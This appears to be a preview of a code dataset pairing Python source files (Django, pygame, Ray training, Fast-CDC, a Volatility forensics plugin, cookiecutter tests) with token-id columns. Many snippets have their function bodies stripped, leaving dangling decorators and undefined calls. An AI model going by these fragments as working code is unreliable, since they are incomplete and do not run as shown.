content stringlengths 1 1.04M | input_ids listlengths 1 774k | ratio_char_token float64 0.38 22.9 | token_count int64 1 774k |
|---|---|---|---|
#! /usr/bin/env python3
# Copyright 2017 John Hanley.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# The software is provided "AS IS", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall
# the authors or copyright holders be liable for any claim, damages or
# other liability, whether in an action of contract, tort or otherwise,
# arising from, out of or in connection with the software or the use or
# other dealings in the software.
import os
import unittest
import dbcred
import simplekml
def result1(query):
'''Run a query that produces a single 1-column result.'''
return result_single_row(query)[0]
def result_single_row(query):
'''Run a query that produces a single row result.'''
ret = None
for row in CONN.execute(query):
ret = row
return ret
if __name__ == '__main__':
CONN, ENGINE, META = dbcred.get_cem('breadcrumb')
os.chdir('/tmp')
explore()
unittest.main()
| [
2,
0,
1220,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
2,
15069,
2177,
1757,
9530,
1636,
13,
198,
2,
198,
2,
2448,
3411,
318,
29376,
7520,
11,
1479,
286,
3877,
11,
284,
597,
1048,
16727,
257,
198,
2,
4866,
286,
428,
3788,
... | 3.588367 | 447 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-14 17:40
from __future__ import unicode_literals
from django.db import migrations, models
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
2980,
515,
416,
37770,
352,
13,
24,
13,
22,
319,
1584,
12,
3312,
12,
1415,
1596,
25,
1821,
198,
6738,
11593,
37443,
834,
1330,
28000,
1098,
62,
17201,
874,
198,
1... | 2.719298 | 57 |
from django.shortcuts import render, reverse
from django.contrib.auth.decorators import login_required
from django.contrib.auth.views import PasswordChangeForm
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.contrib.auth import update_session_auth_hash
from .forms import PersonalFacultyForm, PersonalStaffForm, PersonalUserForm, PersonalStudentForm
# Create your views here.
@login_required
@login_required
@login_required
| [
6738,
42625,
14208,
13,
19509,
23779,
1330,
8543,
11,
9575,
198,
6738,
42625,
14208,
13,
3642,
822,
13,
18439,
13,
12501,
273,
2024,
1330,
17594,
62,
35827,
198,
6738,
42625,
14208,
13,
3642,
822,
13,
18439,
13,
33571,
1330,
30275,
1940... | 3.71875 | 128 |
import pygame
OFFSET = 80
WIDTH, HEIGHT = 640, 640
ROWS, COLS = 8, 8
#size of each square on the board
SQUARE_SIZE = WIDTH//COLS
# rgb
RED = (255, 0, 0)
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
BLUE = (0, 0, 255)
GREY = (128, 128, 128)
BROWN = (139, 69, 19)
PIECE_SIZE = 60
WHITE_PIECE = pygame.transform.scale(
pygame.image.load('assets/whitePiece.png'), (PIECE_SIZE, PIECE_SIZE))
BLACK_PIECE = pygame.transform.scale(
pygame.image.load('assets/blackPiece.png'), (PIECE_SIZE, PIECE_SIZE))
CROWN = pygame.transform.scale(pygame.image.load(
'assets/crown.png'), (PIECE_SIZE*0.7, PIECE_SIZE*0.7))
BOARD = pygame.transform.scale(
pygame.image.load('assets/board.png'), (800, 800))
| [
11748,
12972,
6057,
198,
198,
27977,
28480,
796,
4019,
198,
54,
2389,
4221,
11,
11179,
9947,
796,
33759,
11,
33759,
198,
49,
22845,
11,
20444,
50,
796,
807,
11,
807,
198,
198,
2,
7857,
286,
1123,
6616,
319,
262,
3096,
198,
50,
10917... | 2.254839 | 310 |
import uwsgi
print(uwsgi.opt)
print(uwsgi.magic_table)
from werkzeug.testapp import test_app as application
| [
11748,
334,
18504,
12397,
198,
198,
4798,
7,
84,
18504,
12397,
13,
8738,
8,
198,
4798,
7,
84,
18504,
12397,
13,
32707,
62,
11487,
8,
198,
6738,
266,
9587,
2736,
1018,
13,
9288,
1324,
1330,
1332,
62,
1324,
355,
3586,
198
] | 2.658537 | 41 |
GET_ALL_GENRES = """
SELECT name
FROM genres
"""
INSERT_GENRE = """
INSERT INTO genres (name) VALUES (:name)
"""
| [
18851,
62,
7036,
62,
35353,
19535,
796,
37227,
198,
46506,
1438,
198,
10913,
2662,
27962,
198,
37811,
198,
198,
20913,
17395,
62,
35353,
2200,
796,
37227,
198,
20913,
17395,
39319,
27962,
357,
3672,
8,
26173,
35409,
357,
25,
3672,
8,
19... | 2.651163 | 43 |
#------------------------------------------------------------------------------
# Image Face Triming Tool
# Copyright (c) 2019, scpepper All rights reserved.
#------------------------------------------------------------------------------
import numpy as np
import os
import sys
import cv2
import tensorflow as tf
import glob
#import os.path as osp
import numpy as np
import torch
import RRDBNet_arch as arch
model_file = "./models/human_face_detection.pb"
# Input Definition
detection_graph = tf.Graph()
with detection_graph.as_default():
with open(model_file, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
tf.import_graph_def(graph_def, name="")
sess = tf.Session(graph=detection_graph)
color=(255, 255, 0)
height,width = 64,64
if __name__ == '__main__':
main(sys.argv)
| [
2,
10097,
26171,
198,
2,
7412,
15399,
833,
320,
278,
16984,
198,
2,
15069,
357,
66,
8,
13130,
11,
629,
431,
2848,
1439,
2489,
10395,
13,
198,
2,
10097,
26171,
198,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
28686,
198,
11748,
2... | 3.166038 | 265 |
from setuptools import setup
classifiers = [
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX'
] + [
('Programming Language :: Python :: %s' % x)
for x in '2.7'.split()
]
test_requirements = [
'pytest',
'pytest-cov',
'coveralls',
'mock',
'numpy',
# Only their Exceptions
'setuptools',
'psutil',
'requests'
]
with open('README.rst', 'r') as f:
long_description = f.read()
setup(
name='nginx-amplify-agent-health-check',
version='0.1.6',
description='Static and Dynamic Analysis for nginx-amplify-agent Health Status',
long_description=long_description,
url='https://github.com/hiradyazdan/nginx-amplify-agent-health-check',
author='Hirad Yazdanpanah',
author_email='hirad.y@gmail.com',
license='MIT',
platforms=["linux"],
packages=['amplifyhealthcheck'],
entry_points={
'console_scripts': [
'amphc=amplifyhealthcheck.cli:init_cli'
]
},
classifiers=classifiers,
keywords="nginx amplify nginx-amplify nginx-configuration health-check metrics",
install_requires=[
'psutil',
'setuptools',
'ntplib',
'crossplane',
'requests'
],
setup_requires=['pytest-runner'],
tests_require=test_requirements,
extras_require={
'test': test_requirements,
},
python_requires='==2.7.*',
zip_safe=False
)
| [
6738,
900,
37623,
10141,
1330,
9058,
198,
198,
4871,
13350,
796,
685,
198,
220,
220,
220,
705,
5317,
1631,
7591,
1240,
7904,
34152,
3256,
198,
220,
220,
220,
705,
34156,
7904,
7294,
40,
20010,
1079,
7904,
17168,
13789,
3256,
198,
220,
... | 2.346154 | 624 |
#Configuration file fragment used for ModelpMSSMFilter module (GeneratorInterface/GenFilters/plugins/ModelpMSSMFilter.cc) initalisation
#ModelpMSSMFilter_cfi GeneratorInterface/GenFilters/python/ModelpMSSMFilter_cfi.py
import FWCore.ParameterSet.Config as cms
ModelpMSSMFilter = cms.EDFilter("ModelpMSSMFilter",
gpssrc = cms.InputTag("genParticles"), # input genParticle collection
jetsrc = cms.InputTag("ak4GenJets"), # input genJets collection
genHTcut = cms.double(140.0), # genHT cut
jetEtaCut = cms.double(5.0), # genJet eta cut for HT
jetPtCut = cms.double(30.0), # genJet pT cut for HT
elEtaCut = cms.double(2.5), # gen electron eta cut for single electron trigger
elPtCut = cms.double(15.0), # gen electron pT cut for single electron trigger
gammaEtaCut = cms.double(2.5), # gen photon eta cut for single photon trigger
gammaPtCut = cms.double(70.0), # gen photon pT cut for single photon trigger
muEtaCut = cms.double(2.5), # gen muon eta cut for single muon trigger
muPtCut = cms.double(15.0), # gen muon pT cut for single muon trigger
tauEtaCut = cms.double(2.5), # gen tau eta cut for di-tau trigger
tauPtCut = cms.double(30.0), # gen tau pT cut for di-tau trigger
loosemuPtCut = cms.double(2.5), # gen muon pT cut for soft object trigger
looseelPtCut = cms.double(5.0), # gen electron pT cut for soft object trigger
loosegammaPtCut = cms.double(30.0), # gen photon pT cut for soft object trigger
veryloosegammaPtCut = cms.double(18.0) # gen photon pT cut for di-photon trigger
)
| [
2,
38149,
2393,
24225,
973,
329,
9104,
79,
44,
5432,
44,
22417,
8265,
357,
8645,
1352,
39317,
14,
13746,
11928,
1010,
14,
37390,
14,
17633,
79,
44,
5432,
44,
22417,
13,
535,
8,
287,
1287,
5612,
198,
2,
17633,
79,
44,
5432,
44,
224... | 2.21883 | 786 |
# coding: utf-8
from tornado.web import UIModule
| [
2,
19617,
25,
3384,
69,
12,
23,
198,
6738,
33718,
13,
12384,
1330,
471,
3955,
375,
2261,
628
] | 2.777778 | 18 |
# coding=utf-8
# Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
from hashlib import sha1
from future.utils import PY3
from pants.base.payload_field import PayloadField
from pants.util.objects import datatype
class NativeArtifact(datatype(['lib_name']), PayloadField):
"""A BUILD file object declaring a target can be exported to other languages with a native ABI."""
# TODO: This should probably be made into an @classproperty (see PR #5901).
@classmethod
| [
2,
19617,
28,
40477,
12,
23,
198,
2,
15069,
2864,
41689,
1628,
20420,
357,
3826,
27342,
9865,
3843,
20673,
13,
9132,
737,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
3826,
38559,
24290,
737,
198,
198,
6738,
1... | 3.522222 | 180 |
from datetime import date, timedelta, datetime, time
from django.contrib.contenttypes.models import ContentType
from django.conf import settings
from django.db import models
from django.db import connections
from django.utils import timezone
from .models import Period, StatisticByDate, StatisticByDateAndObject
| [
6738,
4818,
8079,
1330,
3128,
11,
28805,
12514,
11,
4818,
8079,
11,
640,
198,
198,
6738,
42625,
14208,
13,
3642,
822,
13,
11299,
19199,
13,
27530,
1330,
14041,
6030,
198,
6738,
42625,
14208,
13,
10414,
1330,
6460,
198,
6738,
42625,
1420... | 3.785714 | 84 |
"""
Copyright VIP Group
Licensed under the Apache License, Version 2.0.
Modify from https://github.com/rwightman/pytorch-image-models
Original copyright of Ross Wightman below, modifications by VIP Group
Hacked together by / copyright Ross Wightman
"""
from typing import Optional
from collections import OrderedDict
import jittor as jt
from jittor import nn
from .conv2d_same import create_conv2d_pad
class MixedConv2d(ModuleDict):
""" Mixed Grouped Convolution
Based on MDConv and GroupedConv in MixNet impl:
https://github.com/tensorflow/tpu/blob/master/models/official/mnasnet/mixnet/custom_layers.py
"""
| [
37811,
201,
198,
15269,
24791,
4912,
201,
198,
26656,
15385,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
13,
201,
198,
5841,
1958,
422,
3740,
1378,
12567,
13,
785,
14,
31653,
432,
805,
14,
9078,
13165,
354,
12,
9060,
12,
27530,
... | 2.86087 | 230 |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
from oslo_log import log as logging
from oslo_utils import excutils
from heat.common import exception
from heat.common import service_utils
from heat.objects import stack as stack_object
from heat.objects import stack_lock as stack_lock_object
LOG = logging.getLogger(__name__)
| [
2,
198,
2,
220,
220,
220,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
345,
743,
198,
2,
220,
220,
220,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
921,
743,
7330,
198,
2,
... | 3.47619 | 252 |
from time import sleep
from os.path import join
import pytest
from cosmo_tester.framework.examples import get_example_deployment
from cosmo_tester.framework.test_hosts import Hosts, VM
from cosmo_tester.test_suites.snapshots import (
create_snapshot,
download_snapshot,
restore_snapshot,
upload_snapshot,
)
@pytest.fixture(scope='function')
@pytest.fixture(scope='function')
| [
6738,
640,
1330,
3993,
198,
6738,
28686,
13,
6978,
1330,
4654,
198,
198,
11748,
12972,
9288,
198,
198,
6738,
8615,
5908,
62,
4879,
353,
13,
30604,
13,
1069,
12629,
1330,
651,
62,
20688,
62,
2934,
1420,
434,
198,
6738,
8615,
5908,
62,
... | 2.884058 | 138 |
import os, sys, multiprocessing, gym, ray, shutil, argparse, importlib, glob
import numpy as np
# from ray.rllib.agents.ppo import PPOTrainer, DEFAULT_CONFIG
from ray.rllib.agents import ppo, sac
from ray.tune.logger import pretty_print
from numpngw import write_apng
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='RL for Assistive Gym')
parser.add_argument('--env', default='ScratchItchJaco-v0',
help='Environment to train on (default: ScratchItchJaco-v0)')
parser.add_argument('--algo', default='ppo',
help='Reinforcement learning algorithm')
parser.add_argument('--seed', type=int, default=1,
help='Random seed (default: 1)')
parser.add_argument('--train', action='store_true', default=False,
help='Whether to train a new policy')
parser.add_argument('--render', action='store_true', default=False,
help='Whether to render a single rollout of a trained policy')
parser.add_argument('--evaluate', action='store_true', default=False,
help='Whether to evaluate a trained policy over n_episodes')
parser.add_argument('--train-timesteps', type=int, default=1000000,
help='Number of simulation timesteps to train a policy (default: 1000000)')
parser.add_argument('--save-dir', default='./trained_models/',
help='Directory to save trained policy in (default ./trained_models/)')
parser.add_argument('--load-policy-path', default='./trained_models/',
help='Path name to saved policy checkpoint (NOTE: Use this to continue training an existing policy, or to evaluate a trained policy)')
parser.add_argument('--render-episodes', type=int, default=1,
help='Number of rendering episodes (default: 1)')
parser.add_argument('--eval-episodes', type=int, default=100,
help='Number of evaluation episodes (default: 100)')
parser.add_argument('--colab', action='store_true', default=False,
help='Whether rendering should generate an animated png rather than open a window (e.g. when using Google Colab)')
parser.add_argument('--verbose', action='store_true', default=False,
help='Whether to output more verbose prints')
args = parser.parse_args()
coop = ('Human' in args.env)
checkpoint_path = None
if args.train:
checkpoint_path = train(args.env, args.algo, timesteps_total=args.train_timesteps, save_dir=args.save_dir, load_policy_path=args.load_policy_path, coop=coop, seed=args.seed)
if args.render:
render_policy(None, args.env, args.algo, checkpoint_path if checkpoint_path is not None else args.load_policy_path, coop=coop, colab=args.colab, seed=args.seed, n_episodes=args.render_episodes)
if args.evaluate:
evaluate_policy(args.env, args.algo, checkpoint_path if checkpoint_path is not None else args.load_policy_path, n_episodes=args.eval_episodes, coop=coop, seed=args.seed, verbose=args.verbose)
| [
11748,
28686,
11,
25064,
11,
18540,
305,
919,
278,
11,
11550,
11,
26842,
11,
4423,
346,
11,
1822,
29572,
11,
1330,
8019,
11,
15095,
198,
11748,
299,
32152,
355,
45941,
198,
2,
422,
26842,
13,
81,
297,
571,
13,
49638,
13,
16634,
1330... | 2.568275 | 1,223 |
from src.models.fcmlp_model import FCMLPModel
import pickle
from src.datamodules.to_delete.datasets.dnam_dataset import DNAmDataset
from torch.utils.data import DataLoader
from tqdm import tqdm
import pandas as pd
if __name__ == "__main__":
inference()
| [
6738,
12351,
13,
27530,
13,
16072,
4029,
79,
62,
19849,
1330,
10029,
5805,
47,
17633,
198,
11748,
2298,
293,
198,
6738,
12351,
13,
19608,
321,
375,
5028,
13,
1462,
62,
33678,
13,
19608,
292,
1039,
13,
67,
7402,
62,
19608,
292,
316,
... | 2.765957 | 94 |
try:
import json
except ImportError:
import simplejson as json
import codecs
import time
import datetime
import os
import random
import time
import sys
# Just used to highlight matches in tweets. This file does not query anything from Twitter!
queries = ["term1", "term2"]
outputDir = "output/" # Output directory
os.system("mkdir -p %s" % (outputDir)) # Create directory if doesn't exist
fhLog = codecs.open("LOG.txt", 'a', 'UTF-8')
allTweets = {}
fhOverall = None
for file in sys.argv[1:]:
print(file)
fhb = codecs.open(file, "r")
firstLine = fhb.readline()
j = json.loads(firstLine)
if "statuses" in j:
# We have search API. The first (and only line) is a json object
for tweet in j["statuses"]:
parse(tweet)
else:
parse(j)
for line in fhb:
# We have search API, each line is a json object
parse(json.loads(line))
fhb.close()
fhOverall = codecs.open(outputDir + "overall_%s.tsv" % int(time.time()), "w", "UTF-8")
fhOverall.write(Tweet.csvHeader())
for url in allTweets:
tweet = allTweets[url]
fhOverall.write(tweet.csvRow())
fhOverall.close()
logPrint("\nDONE! Completed Successfully")
fhLog.close()
| [
28311,
25,
198,
220,
220,
220,
1330,
33918,
198,
16341,
17267,
12331,
25,
198,
220,
220,
220,
1330,
2829,
17752,
355,
33918,
198,
11748,
40481,
82,
198,
11748,
640,
198,
11748,
4818,
8079,
198,
11748,
28686,
198,
11748,
4738,
198,
11748... | 2.487903 | 496 |
# -*- coding: utf-8 -*-
"""Fast-CDC on Unicode Code Points"""
import logging
from io import StringIO
from os.path import basename
from statistics import mean
from typing import TextIO
from iscc_bench.algos.metrics import jaccard
from iscc_bench.algos.slide import sliding_window
from iscc_bench.readers.mltext import mltext
from iscc_bench.textid.normalize import text_normalize
from iscc_bench.utils import load_text_file
import matplotlib.pyplot as plt
logr = logging.getLogger(__name__)
MAX_INT64 = 2 ** 64 - 1
GEAR2_NORM = 1024
GEAR2_MIN = 64
GEAR2_MAX = 4096
GEAR2_MASK1 = 0b1101100110110100010000
GEAR2_MASK2 = 0b11100101010110000000
CHUNKING_GEAR = [
9584138480181866666,
4739450037122062430,
1042006760432515769,
10675154520554330663,
15869016765101259526,
8970928072383595559,
1399451202205921674,
14523822808097149755,
16268498464839721299,
10481172452375523505,
17104617054662428007,
1589812074021361642,
5529368114994898429,
16097147859444922117,
7366391750793198740,
11100538009918328137,
1389689728615383157,
4977138822009172500,
908349889557194910,
14452518814433479233,
2122926032271239532,
591612022955043504,
9379034436570273189,
12748258297147873806,
4307386326245858243,
13845229916084989633,
11224472648935237303,
7047696390035316099,
2021133566789993437,
17387162748083618158,
11746787256992261957,
6644482612611712714,
15729398955930993486,
18187694890389888249,
13375007170405426180,
4646676434852504131,
13152698236329639071,
899989819383117385,
1604228284900755822,
13429168974601667864,
3706248770764044735,
3719799868214789934,
339511817415309475,
12306710798301877171,
9844020938499650522,
13507342816267977422,
15331217600725578556,
7506003564454403634,
17943236144189306428,
282153689319390566,
7654271695669749695,
2650412143911437370,
6193440044944269691,
9296646612477743744,
15077579129862372948,
67630558006200567,
11937031764123301943,
1634327986517329169,
16073934395340319514,
11660580892053471307,
12301495579660351243,
16908718276972184511,
6851717516129410187,
13288278789994352315,
17482170774163197685,
12177168157992128323,
1679876621412537528,
15666827561093998679,
4235032027386979601,
17396011814487376094,
2036017399572567727,
4977152437582070133,
11341111713611820820,
5866443846249079891,
5131277185090952872,
8325299058005558320,
5701450024662049407,
15870252139465586153,
641910037851244477,
5172232175829573378,
2261684586607900474,
11396825283718526131,
12408680075109652465,
7761877592432080901,
13820035802684848169,
8150091535052795450,
1103357817677537274,
13470426615970288837,
4696524065622673976,
9336804607285957500,
13043178028673218162,
7139020806469476608,
12450708403507569100,
2877039905016676547,
15118872351294838361,
3277072151995360446,
1979210712452295885,
14822651643543876641,
5849754172112174627,
13664543478254756807,
16186972696580520130,
14259131679517995788,
1772106294408535188,
2668205339646827112,
3734021086026184498,
4257506854909152229,
6797729639474582495,
3708095106171770747,
15445894064208319783,
11045733249000282278,
6925260395759991481,
6761677416581440942,
3134957115005596133,
5496794829211694837,
225035875953155227,
18051382753002575119,
6911658830635795092,
6648838042848840266,
7680838377178993211,
14373546918520540763,
7385952462173201391,
7500965322394952100,
15539214383494689771,
14355530880918970074,
4040759991734970063,
1335151750647325670,
13713452291232361388,
8852782707920062625,
6076783566257059794,
14451547968886132839,
6756882940270420653,
17423128808598833972,
5877907771709558759,
14308413074787508328,
12294727846616188882,
13766545313722789196,
7000331838802888702,
15110028412924060381,
15869145452552081798,
10836437530623796047,
1273143868608979117,
17728019699248776702,
379008101491021165,
6658832383485441856,
6005905363267598720,
4792802520786808134,
17024928019214694263,
7949301678895773307,
14602122883430422290,
6416689239839102410,
18112987618441438141,
5424513836620859057,
12327961344656070412,
18229731317766561349,
6214341855555485197,
14659604854593022088,
18341976098904231516,
9093141550798891276,
4487469223051523007,
12576621890114680116,
11368566035561888278,
16632902625329423294,
13764076000271015053,
11494903226088746337,
14079100963083335535,
5976601008655555884,
5685807667042201553,
16503266544486236927,
5505089898459277917,
17076606531971661551,
939769563919939433,
17217248958964594832,
11196454443995107214,
13253314556391295544,
17340262486782904124,
5483165811177129540,
121736889831618943,
6318157315988658220,
14520375112718267902,
689388276875596813,
5273319774965020902,
7975410517565653865,
13935269057627157047,
16821796908479891795,
5882048506860913277,
18003709489856105216,
1424933842252756366,
6634557257081066175,
16179356916240399588,
11153419399622634817,
15654294493035402949,
2652919763627807814,
16437183290373292867,
16903315446495122175,
3575318971059548300,
3073697257555445515,
16187136733800880291,
15191964085364171996,
11982016174040399757,
1948589207658719032,
14444449012119241408,
7130754012353479650,
7480280819583944745,
3603028513293740433,
7021162527209392860,
2124450348946366496,
14349140477237426219,
7396225914272122063,
16288120608246645021,
7309794834881975478,
16746864570463829614,
9239996606832866982,
14126189643057989505,
5785181374404079776,
16681042508550037223,
9085478584447523753,
12879577862603639783,
13351556131001260565,
10860701565908202403,
9109516948909639475,
2942389181877553466,
1907923359833671766,
1700327967934711796,
4355952370607563279,
6159416062364401684,
8120694842642123744,
4670360822544180192,
12684384265447906291,
11518186189217338692,
14839496566538901930,
13515715604989800698,
12135065096961528408,
9056982071865174221,
12690699907549395246,
2080896935929507230,
14546126411900211421,
6222235617711806766,
13387691023848518640,
1259523422199249803,
1733690531272524911,
16691543548458831721,
3252085970219428027,
790320086519395195,
8366099548552136926,
357423734596052102,
6375583027298966643,
88639135753272123,
13813972796887520980,
8203570281250814300,
18377325011640278855,
2922465295015278442,
2164203008979443347,
7447171935848155518,
3663261456454345351,
5865411828910435346,
13570376904595974307,
]
SAMPLES = 500
if __name__ == "__main__":
from pprint import pprint
log_format = "%(asctime)s - %(levelname)s - %(message)s"
logging.basicConfig(level=logging.DEBUG, format=log_format)
r = test_text_chunks()
pprint(r)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
22968,
12,
47667,
319,
34371,
6127,
11045,
37811,
198,
11748,
18931,
198,
6738,
33245,
1330,
10903,
9399,
198,
6738,
28686,
13,
6978,
1330,
1615,
12453,
198,
6738,
... | 1.956935 | 3,785 |
# Copyright (c) 2017, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import os, shutil
import numpy as _np
import coremltools.models.datatypes as datatypes
import unittest
import pytest
import tempfile
from coremltools.models.utils import save_spec
from coremltools.models import MLModel
from coremltools.models.neural_network import (
NeuralNetworkBuilder,
AdamParams,
SgdParams,
)
from coremltools.models.pipeline import PipelineRegressor, PipelineClassifier
| [
2,
15069,
357,
66,
8,
2177,
11,
4196,
3457,
13,
1439,
2489,
10395,
13,
198,
2,
198,
2,
5765,
286,
428,
2723,
2438,
318,
21825,
416,
257,
347,
10305,
12,
18,
12,
565,
682,
5964,
326,
460,
307,
198,
2,
1043,
287,
262,
38559,
24290... | 3.163265 | 196 |
# Generated by Django 2.1.9 on 2019-06-12 08:20
import django.contrib.postgres.fields.jsonb
from django.db import migrations
| [
2,
2980,
515,
416,
37770,
362,
13,
16,
13,
24,
319,
13130,
12,
3312,
12,
1065,
8487,
25,
1238,
198,
198,
11748,
42625,
14208,
13,
3642,
822,
13,
7353,
34239,
13,
25747,
13,
17752,
65,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
... | 2.822222 | 45 |
import os
import math
import collections
import json
import functools
import typing
import text_processing
import Levenshtein
placeholder = '|'
space = ' '
silence = placeholder + space
replace_placeholder = lambda s, rep = '': s.replace(placeholder, rep)
def levenshtein(a, b):
"""Calculates the Levenshtein distance between a and b.
The code was copied from: http://hetland.org/coding/python/levenshtein.py
"""
n, m = len(a), len(b)
if n > m:
# Make sure n <= m, to use O(min(n,m)) space
a, b = b, a
n, m = m, n
current = list(range(n + 1))
for i in range(1, m + 1):
previous, current = current, [i] + [0] * n
for j in range(1, n + 1):
add, delete = previous[j] + 1, current[j - 1] + 1
change = previous[j - 1]
if a[j - 1] != b[i - 1]:
change = change + 1
current[j] = min(add, delete, change)
return current[n]
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
cmd = subparsers.add_parser('analyze')
cmd.add_argument('--hyp', required = True)
cmd.add_argument('--ref', required = True)
cmd.add_argument('--val-config', default = 'configs/ru_val_config.json')
cmd.add_argument('--text-config', default = 'configs/ru_text_config.json')
cmd.add_argument('--pipeline', dest = 'text_pipeline_name', help = 'text processing pipelines (names should be defined in text-config)', default = 'char_legacy')
cmd.add_argument('--vocab', default = 'data/vocab_word_list.txt')
cmd.add_argument('--detailed', action = 'store_true')
cmd.set_defaults(func=cmd_analyze)
cmd = subparsers.add_parser('analyze-file')
cmd.add_argument('--input-file', required = True)
cmd.add_argument('--output-file')
cmd.add_argument('--val-config', default = 'configs/ru_val_config.json')
cmd.add_argument('--text-config', default = 'configs/ru_text_config.json')
cmd.add_argument('--pipeline', dest = 'text_pipeline_name', help = 'text processing pipelines (names should be defined in text-config)', default = 'char_legacy')
cmd.add_argument('--vocab', default = 'data/vocab_word_list.txt')
cmd.add_argument('--detailed', action = 'store_true')
cmd.add_argument('--aggregate-metrics', nargs = '*', default = ['cer', 'wer'])
cmd.set_defaults(func = cmd_analyze_file)
cmd = subparsers.add_parser('align')
cmd.add_argument('--hyp', required = True)
cmd.add_argument('--ref', required = True)
cmd.set_defaults(func=cmd_align)
args = parser.parse_args()
args = vars(parser.parse_args())
func = args.pop('func')
func(**args)
| [
11748,
28686,
198,
11748,
10688,
198,
11748,
17268,
198,
11748,
33918,
198,
11748,
1257,
310,
10141,
198,
11748,
19720,
198,
11748,
2420,
62,
36948,
198,
11748,
1004,
574,
1477,
22006,
198,
198,
5372,
13829,
796,
705,
91,
6,
198,
13200,
... | 2.701064 | 940 |
# -*- coding: UTF-8 -*-
"""
:Script: string_defs.py
:Author: Dan.Patterson@carleton.ca
:Modified: 2017-06-17
:Purpose: tools for working strings
:Useage:
: These are mini-onliners or so
:---------------------------------------------------------------------:
"""
# ---- imports, formats, constants ----
a = 'A string with numbers 10 20 in it'
keep_text = "".join([i for i in a if i.isalpha() or i == " "]).strip()
strip_spaces = " ".join([i.strip() for i in a.split(" ") if i != ""])
keep_numb = "".join([i for i in a if i.isdigit() or i == " "]).strip()
num_csv = ", ".join([i for i in a.split() if i.isdigit() ]).strip()
frmt = """
Input string......... {}
Just text ........... {}
Strip extra spaces .. {}
Just numbers ........ {}
Numbers to csv ...... {}
"""
args = [a, keep_text, strip_spaces, keep_numb, num_csv]
print(frmt.format(*args))
| [
2,
532,
9,
12,
19617,
25,
41002,
12,
23,
532,
9,
12,
201,
198,
37811,
201,
198,
25,
7391,
25,
220,
220,
4731,
62,
4299,
82,
13,
9078,
201,
198,
25,
13838,
25,
220,
220,
6035,
13,
12130,
23192,
31,
7718,
10565,
13,
6888,
201,
1... | 2.647929 | 338 |
# Volatility
# Copyright (C) 2007-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License Version 2 as
# published by the Free Software Foundation. You may not use, modify or
# distribute this program under any other version of the GNU General
# Public License.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Andrew Case
@license: GNU General Public License 2.0
@contact: atcuno@gmail.com
@organization:
"""
import volatility.obj as obj
import volatility.debug as debug
import volatility.plugins.linux.common as linux_common
import socket
class linux_route_cache(linux_common.AbstractLinuxCommand):
""" Recovers the routing cache from memory """
| [
2,
4709,
18486,
198,
2,
15069,
357,
34,
8,
4343,
12,
6390,
4709,
18486,
5693,
198,
2,
198,
2,
770,
2393,
318,
636,
286,
4709,
18486,
13,
198,
2,
198,
2,
4709,
18486,
318,
1479,
3788,
26,
345,
460,
17678,
4163,
340,
290,
14,
273,... | 3.63522 | 318 |
import numpy as np
from PIL import Image
import xml.etree.ElementTree as ET
import scipy.misc as scm
| [
11748,
299,
32152,
355,
45941,
198,
6738,
350,
4146,
1330,
7412,
198,
11748,
35555,
13,
316,
631,
13,
20180,
27660,
355,
12152,
198,
11748,
629,
541,
88,
13,
44374,
355,
629,
76,
198
] | 3.060606 | 33 |
import os
import pytest
from click.testing import CliRunner
from cookiecutter.cli import main
from cookiecutter import utils
runner = CliRunner()
@pytest.fixture
def remove_fake_project_dir(request):
"""
Remove the fake project directory created during the tests.
"""
request.addfinalizer(fin_remove_fake_project_dir)
@pytest.fixture
def make_fake_project_dir(request):
"""
Create the fake project directory created during the tests.
"""
if not os.path.isdir('fake-project'):
os.makedirs('fake-project')
@pytest.mark.usefixtures('make_fake_project_dir', 'remove_fake_project_dir')
@pytest.mark.usefixtures('remove_fake_project_dir')
@pytest.mark.usefixtures('remove_fake_project_dir')
| [
11748,
28686,
198,
11748,
12972,
9288,
198,
198,
6738,
3904,
13,
33407,
1330,
1012,
72,
49493,
198,
198,
6738,
19751,
